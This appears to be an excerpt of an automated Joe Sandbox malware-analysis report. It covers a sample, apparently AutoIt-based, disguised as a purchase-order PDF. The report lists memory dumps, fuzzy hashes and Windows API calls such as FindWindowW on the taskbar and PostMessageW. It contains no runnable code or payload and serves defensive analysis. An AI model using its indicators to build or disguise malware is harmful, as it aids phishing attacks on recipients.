• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _strncmp
• String ID: ,$UTF8)
• API String ID: 909875538-2632631837
• Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
• Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
• Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _strncmp
• String ID: ,$UTF8)
• API String ID: 909875538-2632631837
• Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
• Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
• Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• wsprintfW.USER32 ref: 004560E9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend_mallocwsprintf
• String ID: %d/%02d/%02d
• API String ID: 1262938277-328681919
• Opcode ID: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
• Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
• Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                            • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                                                                                                                                                                                                            • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                            • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                                                                                                                                                                                            • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Message_doexit
                                                                                                                                                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                            • API String ID: 1993061046-4017498283
                                                                                                                                                                                                                                                                                                            • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E